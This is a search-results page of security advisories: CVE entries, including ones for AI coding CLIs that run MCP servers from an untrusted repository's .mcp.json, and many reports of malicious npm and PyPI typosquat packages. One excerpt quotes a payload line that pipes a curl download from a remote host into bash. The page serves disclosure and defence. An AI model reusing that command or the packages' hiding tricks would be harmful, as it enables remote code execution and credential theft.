6402 matches found
CVE-2026-57860 ForgeCode Arbitrary Code Execution via Unvetted .mcp.json in Untrusted Repository
ForgeCode tailcallhq/forgecode, an AI pair-programming CLI, automatically loads and executes the MCP servers defined in a repository's .mcp.json file on startup without user confirmation. A malicious repository can supply a crafted .mcp.json whose mcpServers entries specify arbitrary command and...
EUVD-2026-45217
ForgeCode tailcallhq/forgecode, an AI pair-programming CLI, automatically loads and executes the MCP servers defined in a repository's .mcp.json file on startup without user confirmation. A malicious repository can supply a crafted .mcp.json whose mcpServers entries specify arbitrary command and...
MAL-2026-10770 Malicious code in govpkg (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ae4127ce9f51f78b54d36d3fed4dcf206062f36a84588a0c65d99443d059332e Source: kam193 736ef874636ee77d0a5007dea41ad6329e0d5523bfeb5254930985f451a6f6f6 When using the provided functionality, the package silently downloads a...
CVE-2026-62222
OpenClaw before 2026.5.22 contain a vulnerability in setup-mode discovery that allows loading of untrusted workspace plugins. Attackers with lower-trust caller access or control over configured input paths can execute or persist actions beyond their intended authorization level...
EUVD-2026-45110
OpenClaw before 2026.5.22 contain a vulnerability in setup-mode discovery that allows loading of untrusted workspace plugins. Attackers with lower-trust caller access or control over configured input paths can execute or persist actions beyond their intended authorization level...
EUVD-2026-44950
Axelor Open Platform versions 8.x prior to 8.2.2 contains an authorization bypass vulnerability that allows authenticated non-admin users to escalate privileges by exploiting unenforced field restrictions on nested relational save operations. Attackers can modify sensitive User record fields such...
CVE-2026-63085
Axelor Open Platform 8.x prior to 8.2.2 contains an authorization bypass vulnerability. Authenticated non-admins can escalate privileges by exploiting unenforced field restrictions on nested relational save operations, enabling modification of sensitive User fields (roles, groups) through a relat...
HelloNet campaign — new malicious modules launched through the ViPNet update system
UPD 16.07.2026: Added rules to protect companies using our SIEM system Kaspersky SIEM, and listed events for developing custom detection rules or conducting Threat hunting. UPD 16.07.2026: Added detection of the malicious activity using Kaspersky Managed Detection and Response. UPD 16.07.2026:...
Malicious code in vor8zakon (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 99924288481504c324c3f573ba7ba99ac4e1c7a7f22a940c94d81059b868fdfd Package advertises itself as 'A simple cryptographic library for JavaScript applications' but ships no crypto code and exports nothing. package.json...
MAL-2026-10691 Malicious code in internallib_v907 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e index.js line 5 invokes exec'/bin/bash -c "curl https://reverse-shell.sh/... | sh"', piping a remote script directly into a shell. The fetched payloa...
Malicious code in pylogora (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dfecc686b83d148b0b68acd99fe38f484c035c5b9c59fb7623378866e8e307cc pylogora/init.py invokes a at module top level, so any import pylogora triggers the payload. a base64-decodes hidden URLs and filesystem paths,...
MAL-2026-10689 Malicious code in pylogora (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dfecc686b83d148b0b68acd99fe38f484c035c5b9c59fb7623378866e8e307cc pylogora/init.py invokes a at module top level, so any import pylogora triggers the payload. a base64-decodes hidden URLs and filesystem paths,...
CVE-2026-14960 CVE-2026-14960
Pegatron Tdelo64.sys improperly exposes privileged hardware access functionality through the \.\TdeIo device interface. IOCTL handlers including TDEIOCTLINDEXIOREAD and TDEIOCTLINDEXIOWRITE permit unprivileged user-mode callers to perform arbitrary hardware I/O port reads and writes without...
Malicious code in ethereum-input-decorder (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 94137fcf0aee7d8edb4e15a8bc9be4455fbdf79cb5bf99987b79f0393fdff62c The package name typosquats the legitimate 'ethereum-input-decoder'. Its top-level init.py unconditionally invokes a payload routine on import: it...
MAL-2026-10643 Malicious code in ethereum-input-decorder (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 94137fcf0aee7d8edb4e15a8bc9be4455fbdf79cb5bf99987b79f0393fdff62c The package name typosquats the legitimate 'ethereum-input-decoder'. Its top-level init.py unconditionally invokes a payload routine on import: it...
MAL-2026-10591 Malicious code in solana-key-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 68b4680547530fce361014fe8c228734a8ec33bc8c834f46285e371e8f6b9f92 On require, index.js waits 37 seconds, reads test/fixtures/keypairs.dat a 53KB base64 blob disguised as a test fixture, no test harness references it...
MAL-2026-10580 Malicious code in ethers-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3959190c7c321e0d6f512b89b3c54a6399f3e6f7daecd0563ff753a6a6fed2f5 Package name typosquats the popular 'ethers' library. package.json declares a postinstall pointing at dist/index.min.js, whose sole top-level stateme...
Malicious code in ethers-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3959190c7c321e0d6f512b89b3c54a6399f3e6f7daecd0563ff753a6a6fed2f5 Package name typosquats the popular 'ethers' library. package.json declares a postinstall pointing at dist/index.min.js, whose sole top-level stateme...
Malicious code in tennacity (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c7933cd1ec11531feba788870555eeac615535d8e230b4d252880def9c68ff5e tennacity is a one-character typosquat of the popular 'tenacity' library; its README/PKG-INFO are copied verbatim from real tenacity while setup.py...
MAL-2026-10576 Malicious code in tennacity (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c7933cd1ec11531feba788870555eeac615535d8e230b4d252880def9c68ff5e tennacity is a one-character typosquat of the popular 'tenacity' library; its README/PKG-INFO are copied verbatim from real tenacity while setup.py...